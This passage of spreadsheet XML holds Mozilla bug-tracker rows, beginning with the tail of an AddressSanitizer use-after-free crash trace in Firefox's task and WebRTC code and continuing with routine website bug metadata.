#15 0x7f72b5a6dfbc in std::unique_ptr&lt;mozilla::TaskController, std::default_delete&lt;mozilla::TaskController&gt; &gt;::~unique_ptr() /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/unique_ptr.h:78
#16 0x7f72b5a6dfbc in ~unique_ptr /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/unique_ptr.h:263
#17 0x7f72d2615a26 in __libc_secure_getenv ??:?
previously allocated by thread T3 (Socket Thread) here:
#0 0x55bb39784f1d in malloc _asan_rtl_
#1 0x55bb397bfb8d in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52
#2 0x7f72b5aaff62 in std::_Rb_tree_node&lt;RefPtr&lt;mozilla::Task&gt; &gt;* std::_Rb_tree&lt;RefPtr&lt;mozilla::Task&gt;, RefPtr&lt;mozilla::Task&gt;, std::_Identity&lt;RefPtr&lt;mozilla::Task&gt; &gt;, mozilla::Task::PriorityCompare, std::allocator&lt;RefPtr&lt;mozilla::Task&gt; &gt; &gt;::_Alloc_node::operator()&lt;RefPtr&lt;mozilla::Task&gt; &gt;(RefPtr&lt;mozilla::Task&gt;&amp;&amp;) const /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:33
#3 0x7f72b5aaff62 in allocate /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/ext/new_allocator.h:111
#4 0x7f72b5aaff62 in allocate /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/alloc_traits.h:436
#5 0x7f72b5aaff62 in _M_get_node /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_tree.h:588
#6 0x7f72b5aaff62 in _M_create_node&lt;RefPtr&lt;mozilla::Task&gt; &gt; /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_tree.h:642
#7 0x7f72b5aaff62 in operator()&lt;RefPtr&lt;mozilla::Task&gt; &gt; /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_tree.h:556
#8 0x7f72b5aafd97 in std::_Rb_tree_iterator&lt;RefPtr&lt;mozilla::Task&gt; &gt; std::_Rb_tree&lt;RefPtr&lt;mozilla::Task&gt;, RefPtr&lt;mozilla::Task&gt;, std::_Identity&lt;RefPtr&lt;mozilla::Task&gt; &gt;, mozilla::Task::PriorityCompare, std::allocator&lt;RefPtr&lt;mozilla::Task&gt; &gt; &gt;::_M_insert_&lt;RefPtr&lt;mozilla::Task&gt;, std::_Rb_tree&lt;RefPtr&lt;mozilla::Task&gt;, RefPtr&lt;mozilla::Task&gt;, std::_Identity&lt;RefPtr&lt;mozilla::Task&gt; &gt;, mozilla::Task::PriorityCompare, std::allocator&lt;RefPtr&lt;mozilla::Task&gt; &gt; &gt;::_Alloc_node&gt;(std::_Rb_tree_node_base*, std::_Rb_tree_node_base*, RefPtr&lt;mozilla::Task&gt;&amp;&amp;, std::_Rb_tree&lt;RefPtr&lt;mozilla::Task&gt;, RefPtr&lt;mozilla::Task&gt;, std::_Identity&lt;RefPtr&lt;mozilla::Task&gt; &gt;, mozilla::Task::PriorityCompare, std::allocator&lt;RefPtr&lt;mozilla::Task&gt; &gt; &gt;::_Alloc_node&amp;) /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_tree.h:1753
#9 0x7f72b5a7092b in _M_insert_unique&lt;RefPtr&lt;mozilla::Task&gt; &gt; /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_tree.h:2096
#10 0x7f72b5a7092b in insert /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_set.h:511
#11 0x7f72b5a7092b in AddTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:357
#12 0x7f72b5a72422 in mozilla::TaskController::DispatchRunnable(already_AddRefed&lt;nsIRunnable&gt;&amp;&amp;, unsigned int, mozilla::TaskManager*) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:504
#13 0x7f72b5a598e2 in mozilla::detail::EventQueueInternal&lt;16ul&gt;::PutEvent(already_AddRefed&lt;nsIRunnable&gt;&amp;&amp;, mozilla::EventQueuePriority, mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;, mozilla::BaseTimeDuration&lt;mozilla::TimeDurationValueCalculator&gt;*) /builds/worker/checkouts/gecko/xpcom/threads/EventQueue.cpp:55
#14 0x7f72b5a7a20d in mozilla::ThreadEventQueue::PutEventInternal(already_AddRefed&lt;nsIRunnable&gt;&amp;&amp;, mozilla::EventQueuePriority, mozilla::ThreadEventQueue::NestedSink*) /builds/worker/checkouts/gecko/xpcom/threads/ThreadEventQueue.cpp:121
#15 0x7f72b5a7c168 in mozilla::ThreadEventTarget::Dispatch(already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/ThreadEventTarget.cpp:97
#16 0x7f72b5a8ace7 in nsresult detail::ProxyRelease&lt;nsISupports&gt;(char const*, nsIEventTarget*, already_AddRefed&lt;nsISupports&gt;, bool) /builds/worker/workspace/obj-build/dist/include/nsIEventTarget.h:41
#17 0x7f72b5a8ace7 in ProxyRelease&lt;nsISupports&gt; /builds/worker/checkouts/gecko/xpcom/threads/nsProxyRelease.h:79
#18 0x7f72bc403b6b in nsMainThreadPtrHolder&lt;mozilla::TransceiverImpl&gt;::~nsMainThreadPtrHolder() /builds/worker/workspace/obj-build/dist/include/nsProxyRelease.h:105
#19 0x7f72bc403b6b in NS_ProxyRelease&lt;mozilla::TransceiverImpl&gt; /builds/worker/workspace/obj-build/dist/include/nsProxyRelease.h:143
#20 0x7f72bc403b6b in ~nsMainThreadPtrHolder /builds/worker/workspace/obj-build/dist/include/nsProxyRelease.h:279
#21 0x7f72bc4781ee in mozilla::detail::RunnableFunction&lt;mozilla::TransceiverImpl::TransceiverImpl(nsPIDOMWindowInner*, bool, std::__cxx11::basic_string&lt;char, std::char_traits&lt;char&gt;, std::allocator&lt;char&gt; &gt; const&amp;, mozilla::MediaTransportHandler*, mozilla::JsepTransceiver*, nsISerialEventTarget*, nsISerialEventTarget*, mozilla::dom::MediaStreamTrack*, mozilla::WebRtcCallWrapper*)::$_98&gt;::~RunnableFunction() /builds/worker/workspace/obj-build/dist/include/nsProxyRelease.h:304
#22 0x7f72bc4781ee in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:50
#23 0x7f72bc4781ee in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:381
#24 0x7f72bc4781ee in ~RefPtr /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:81
#25 0x7f72bc4781ee in ~nsMainThreadPtrHandle /builds/worker/workspace/obj-build/dist/include/nsProxyRelease.h:321
#26 0x7f72bc4781ee in ~ /builds/worker/checkouts/gecko/dom/media/webrtc/jsapi/TransceiverImpl.cpp:97
#27 0x7f72bc4781ee in ~RunnableFunction /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:522
#28 0x7f72bc4781ee in ~RunnableFunction /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:522
#29 0x7f72b5a7dd95 in mozilla::Runnable::Release() /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:60
#30 0x7f72b5a9226b in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/obj-build/dist/include/nsCOMPtr.h:377
#31 0x7f72b5a9226b in assign_assuming_AddRef /builds/worker/workspace/obj-build/dist/include/nsCOMPtr.h:400
#32 0x7f72b5a9226b in operator= /builds/worker/workspace/obj-build/dist/include/nsCOMPtr.h:696
#33 0x7f72b5a9226b in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1185
#34 0x7f72b5a9c6ec in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467
#35 0x7f72b5e5d0b1 in mozilla::net::nsSocketTransportService::Run() /builds/worker/checkouts/gecko/netwerk/base/nsSocketTransportService2.cpp:1190
#36 0x7f72b5e5ed0c in non-virtual thunk to mozilla::net::nsSocketTransportService::Run() crtstuff.c:?
#37 0x7f72b5a929f4 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1169
#38 0x7f72b5a9c6ec in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467
#39 0x7f72b6f23e0d in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300
Thread T57 (MediaTimer #1) created by T55 (MediaDe~hine #1) here:
#0 0x55bb3976f61c in pthread_create _asan_rtl_
#1 0x7f72d11f6124 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:458
#2 0x7f72d11e73ce in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:533
#3 0x7f72b5a8ebcd in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:607
#4 0x7f72b5a9a9cf in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadManager.cpp:581
#5 0x7f72b5aa4c31 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:163
#6 0x7f72b5a9e859 in nsThreadPool::PutEvent(already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:155
#7 0x7f72b5a9e859 in PutEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:120
#8 0x7f72b5aa0ae9 in nsThreadPool::Dispatch(already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:357
#9 0x7f72bbc81877 in mozilla::MediaTimer::ScheduleUpdate() /builds/worker/checkouts/gecko/dom/media/MediaTimer.cpp:99
#10 0x7f72bbc81441 in mozilla::MediaTimer::WaitUntil(mozilla::TimeStamp const&amp;, char const*) /builds/worker/checkouts/gecko/dom/media/MediaTimer.cpp:82
#11 0x7f72bba09001 in mozilla::MediaDecoderStateMachine::SetVideoDecodeModeInternal(mozilla::VideoDecodeMode) /builds/worker/checkouts/gecko/dom/media/MediaTimer.h:140
#12 0x7f72bba09001 in SetVideoDecodeModeInternal /builds/worker/checkouts/gecko/dom/media/MediaDecoderStateMachine.cpp:3198
#13 0x7f72bbba2086 in mozilla::detail::RunnableMethodImpl&lt;mozilla::MediaDecoderStateMachine*, void (mozilla::MediaDecoderStateMachine::*)(mozilla::VideoDecodeMode), true, (mozilla::RunnableKind)0, mozilla::VideoDecodeMode&gt;::Run() /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1147
#14 0x7f72bbba2086 in apply&lt;mozilla::MediaDecoderStateMachine, void (mozilla::MediaDecoderStateMachine::*)(mozilla::VideoDecodeMode)&gt; /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1153
#15 0x7f72bbba2086 in Run /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1200
#16 0x7f72b5a6a9d6 in mozilla::AutoTaskDispatcher::TaskGroupRunnable::Run() /builds/worker/workspace/obj-build/dist/include/mozilla/TaskDispatcher.h:217
#17 0x7f72b5a77f0d in mozilla::TaskQueue::Runner::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskQueue.cpp:208
#18 0x7f72b5a9fc3b in nsThreadPool::Run() /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:305
#19 0x7f72b5a929f4 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1169
#20 0x7f72b5a9c6ec in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467
#21 0x7f72b6f23e0d in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300
#22 0x7f72b6dae1f1 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331
#23 0x7f72b6dae1f1 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
#24 0x7f72b6dae1f1 in Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
#25 0x7f72b5a8bd7b in nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:391
#26 0x7f72d120609e in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201
#27 0x7f72d2b26608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477
Thread T55 (MediaDe~hine #1) created by T0 (Web Content) here:
#0 0x55bb3976f61c in pthread_create _asan_rtl_
#1 0x7f72d11f6124 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:458
#2 0x7f72d11e73ce in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:533
#3 0x7f72b5a8ebcd in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:607
#4 0x7f72b5a9a9cf in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadManager.cpp:581
#5 0x7f72b5aa4c31 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:163
#6 0x7f72b5a9e859 in NS_NewNamedThread /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:155
#7 0x7f72b5a9e859 in PutEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:120
#8 0x7f72b5aa0ae9 in nsThreadPool::Dispatch(already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:357
#9 0x7f72b5a75d23 in mozilla::TaskQueue::DispatchLocked(nsCOMPtr&lt;nsIRunnable&gt;&amp;, unsigned int, mozilla::AbstractThread::DispatchReason) /builds/worker/checkouts/gecko/xpcom/threads/TaskQueue.cpp:68
#10 0x7f72b5aa8933 in mozilla::TaskQueue::Dispatch(already_AddRefed&lt;nsIRunnable&gt;, mozilla::AbstractThread::DispatchReason) /builds/worker/workspace/obj-build/dist/include/mozilla/TaskQueue.h:87
#11 0x7f72b5a6a755 in mozilla::AutoTaskDispatcher::DispatchTaskGroup(mozilla::UniquePtr&lt;mozilla::AutoTaskDispatcher::PerThreadTaskGroup, mozilla::DefaultDelete&lt;mozilla::AutoTaskDispatcher::PerThreadTaskGroup&gt; &gt;) /builds/worker/workspace/obj-build/dist/include/mozilla/TaskDispatcher.h:275
#12 0x7f72b5a69b36 in mozilla::AutoTaskDispatcher::~AutoTaskDispatcher() /builds/worker/workspace/obj-build/dist/include/mozilla/TaskDispatcher.h:121
#13 0x7f72b5a6bad9 in mozilla::XPCOMThreadWrapper::MaybeFireTailDispatcher() /builds/worker/workspace/obj-build/dist/include/mozilla/Maybe.h:639
#14 0x7f72b5a6bad9 in MaybeFireTailDispatcher /builds/worker/checkouts/gecko/xpcom/threads/AbstractThread.cpp:195
#15 0x7f72b5a67fac in non-virtual thunk to mozilla::XPCOMThreadWrapper::AfterProcessNextEvent(nsIThreadInternal*, bool) /builds/worker/checkouts/gecko/xpcom/threads/AbstractThread.cpp:133
#16 0x7f72b5a67fac in ?? ??:0
#17 0x7f72b5a92537 in ?? ??:0
#18 0x7f72b5a92537 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1199
#19 0x7f72b5a9c6ec in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467
#20 0x7f72b6f2284f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
#21 0x7f72b6dae1f1 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331
#22 0x7f72b6dae1f1 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
#23 0x7f72b6dae1f1 in Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
#24 0x7f72bd5a8567 in nsBaseAppShell::Run() /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137
#25 0x7f72c16ff5df in XRE_RunAppShell() /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:917
#26 0x7f72b6dae1f1 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331
#27 0x7f72b6dae1f1 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
#28 0x7f72b6dae1f1 in Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
#29 0x7f72c16fe851 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:749
#30 0x55bb397b987d in content_process_main(mozilla::Bootstrap*, int, char**) /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:57
#31 0x55bb397b9ca8 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327
#32 0x7f72d25f30b2 in __libc_start_main ??:?
Thread T3 (Socket Thread) created by T0 (Web Content) here:
#0 0x55bb3976f61c in pthread_create _asan_rtl_
#1 0x7f72d11f6124 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:458
#2 0x7f72d11e73ce in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:533
#3 0x7f72b5a8ebcd in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:607
#4 0x7f72b5a9a9cf in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadManager.cpp:581
#5 0x7f72b5aa4c31 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:163
#6 0x7f72b5e5aaea in mozilla::net::nsSocketTransportService::Init() /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:85
#7 0x7f72b5e5aaea in Init /builds/worker/checkouts/gecko/netwerk/base/nsSocketTransportService2.cpp:760
#8 0x7f72b59ff719 in mozilla::xpcom::CreateInstanceImpl(mozilla::xpcom::ModuleID, nsISupports*, nsID const&amp;, void**) /builds/worker/workspace/obj-build/xpcom/components/StaticComponents.cpp:11443
#9 0x7f72b5a455b6 in nsComponentManagerImpl::GetServiceLocked(mozilla::Maybe&lt;mozilla::MonitorAutoLock&gt;&amp;, (anonymous namespace)::EntryWrapper&amp;, nsID const&amp;, void**) /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:177
#10 0x7f72b5a455b6 in GetServiceLocked /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:1276
#11 0x7f72b5a4762c in nsComponentManagerImpl::GetServiceByContractID(char const*, nsID const&amp;, void**) /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:1465
#12 0x7f72b5a4d042 in nsGetServiceByContractIDWithError::operator()(nsID const&amp;, void**) const /builds/worker/checkouts/gecko/xpcom/components/nsComponentManagerUtils.cpp:61
#13 0x7f72b5a4d042 in operator() /builds/worker/checkouts/gecko/xpcom/components/nsComponentManagerUtils.cpp:253
#14 0x7f72b58a6a2d in nsCOMPtr_base::assign_from_gs_contractid_with_error(nsGetServiceByContractIDWithError const&amp;, nsID const&amp;) /builds/worker/checkouts/gecko/xpcom/base/nsCOMPtr.cpp:91
#15 0x7f72b5db45cb in mozilla::net::nsIOService::InitializeSocketTransportService() /builds/worker/workspace/obj-build/dist/include/nsCOMPtr.h:774
#16 0x7f72b5db45cb in InitializeSocketTransportService /builds/worker/checkouts/gecko/netwerk/base/nsIOService.cpp:421
#17 0x7f72b5db3340 in mozilla::net::nsIOService::SetOffline(bool) /builds/worker/checkouts/gecko/netwerk/base/nsIOService.cpp:1272
#18 0x7f72b5db1661 in mozilla::net::nsIOService::Init() /builds/worker/checkouts/gecko/netwerk/base/nsIOService.cpp:305
#19 0x7f72b5db524b in mozilla::net::nsIOService::GetInstance() /builds/worker/checkouts/gecko/netwerk/base/nsIOService.cpp:478
#20 0x7f72b5a087b6 in mozilla::xpcom::CreateInstanceImpl(mozilla::xpcom::ModuleID, nsISupports*, nsID const&amp;, void**) /builds/worker/workspace/obj-build/xpcom/components/StaticComponents.cpp:10077
#21 0x7f72b5a455b6 in CreateInstance /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:177
#22 0x7f72b5a455b6 in GetServiceLocked /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:1276
#23 0x7f72b5a4762c in nsComponentManagerImpl::GetServiceByContractID(char const*, nsID const&amp;, void**) /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:1465
#24 0x7f72b8035a77 in nsScriptSecurityManager::Init() /builds/worker/workspace/obj-build/dist/include/nsServiceManagerUtils.h:52
#25 0x7f72b8035a77 in Init /builds/worker/checkouts/gecko/caps/nsScriptSecurityManager.cpp:1476
#26 0x7f72b8036019 in nsScriptSecurityManager::InitStatics() /builds/worker/checkouts/gecko/caps/nsScriptSecurityManager.cpp:1537
#27 0x7f72b7dc42b7 in nsXPConnect::InitStatics() /builds/worker/checkouts/gecko/js/xpconnect/src/nsXPConnect.cpp:153
#28 0x7f72b7d57f18 in xpcModuleCtor() /builds/worker/checkouts/gecko/js/xpconnect/src/XPCModule.cpp:11
#29 0x7f72be3a5f18 in nsLayoutModuleInitialize() /builds/worker/checkouts/gecko/layout/build/nsLayoutModule.cpp:100
#30 0x7f72b5a3d0b6 in nsComponentManagerImpl::Init() /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:408
#31 0x7f72b5b025ca in NS_InitXPCOM /builds/worker/checkouts/gecko/xpcom/build/XPCOMInit.cpp:446
#32 0x7f72c16fdec7 in XRE_InitEmbedding2(nsIFile*, nsIFile*, nsIDirectoryServiceProvider*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:192
#33 0x7f72b6f689aa in mozilla::ipc::ScopedXREEmbed::Start() /builds/worker/checkouts/gecko/ipc/glue/ScopedXREEmbed.cpp:?
#34 0x7f72bcdc5c80 in mozilla::dom::ContentProcess::Init(int, char**) /builds/worker/checkouts/gecko/dom/ipc/ContentProcess.cpp:157
#35 0x7f72c16fe824 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:715
#36 0x55bb397b987d in content_process_main(mozilla::Bootstrap*, int, char**) /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:57
#37 0x55bb397b9ca8 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327
#38 0x7f72d25f30b2 in __libc_start_main ??:?
SUMMARY: AddressSanitizer: heap-use-after-free (/home/bobo/code/browsers/firefox/libxul.so+0x5525f3b)
Shadow bytes around the buggy address:
0x0c0880294450: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd
0x0c0880294460: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd
0x0c0880294470: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd
0x0c0880294480: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 fa
0x0c0880294490: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 fa
=&gt;0x0c08802944a0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd[fd]fa
0x0c08802944b0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd
0x0c08802944c0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd
0x0c08802944d0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd
0x0c08802944e0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd
0x0c08802944f0: fa fa fd fd fd fd fd fd fa fa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588784==ABORTING
```
This vuln is discovered by bo13oy of Cyber Kunlun Lab.
Thanks.</t>
        </is>
      </c>
      <c r="X679" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="680">
      <c r="A680" t="n">
        <v>800802</v>
      </c>
      <c r="B680" t="inlineStr">
        <is>
          <t>2012-10-11 23:56:17 -0700</t>
        </is>
      </c>
      <c r="C680" t="inlineStr">
        <is>
          <t>Question metadata sometimes upside down in search results</t>
        </is>
      </c>
      <c r="D680" t="inlineStr">
        <is>
          <t>2016-03-04 07:33:47 -0800</t>
        </is>
      </c>
      <c r="E680" t="n">
        <v>1</v>
      </c>
      <c r="F680" t="n">
        <v>1</v>
      </c>
      <c r="G680" t="n">
        <v>5</v>
      </c>
      <c r="H680" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I680" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J680" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K680" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L680" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M680" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N680" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O680" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P680" t="inlineStr">
        <is>
          <t>u=user c=search p=1 s=2012.19 [site:support.mozilla.org]</t>
        </is>
      </c>
      <c r="Q680" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R680" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S680" t="inlineStr">
        <is>
          <t>2012Q4</t>
        </is>
      </c>
      <c r="T680" t="n">
        <v>1</v>
      </c>
      <c r="U680" t="n">
        <v>0</v>
      </c>
      <c r="V680" t="n">
        <v>15</v>
      </c>
      <c r="W680" t="inlineStr">
        <is>
          <t>It seems to happen for questions with raw text. In that case, metadata is also in raw format.
See https://support.mozilla.org/en-US/search?q=sound&amp;num_voted=0&amp;num_votes=&amp;asked_by=&amp;answered_by=&amp;q_tags=mobile&amp;created=2&amp;created_date=08%2F01%2F2012&amp;updated=0&amp;updated_date=&amp;sortby=0&amp;a=1&amp;w=2</t>
        </is>
      </c>
      <c r="X680" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="681">
      <c r="A681" t="n">
        <v>1209992</v>
      </c>
      <c r="B681" t="inlineStr">
        <is>
          <t>2015-09-30 08:15:12 -0700</t>
        </is>
      </c>
      <c r="C681" t="inlineStr">
        <is>
          <t>Update /firefox/push FAQ page</t>
        </is>
      </c>
      <c r="D681" t="inlineStr">
        <is>
          <t>2015-11-02 11:50:41 -0800</t>
        </is>
      </c>
      <c r="E681" t="n">
        <v>1</v>
      </c>
      <c r="F681" t="n">
        <v>1</v>
      </c>
      <c r="G681" t="n">
        <v>5</v>
      </c>
      <c r="H681" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I681" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J681" t="inlineStr">
        <is>
          <t>Pages &amp; Content</t>
        </is>
      </c>
      <c r="K681" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L681" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M681" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N681" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O681" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P681" t="inlineStr">
        <is>
          <t xml:space="preserve">[kb=1886480] </t>
        </is>
      </c>
      <c r="Q681" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
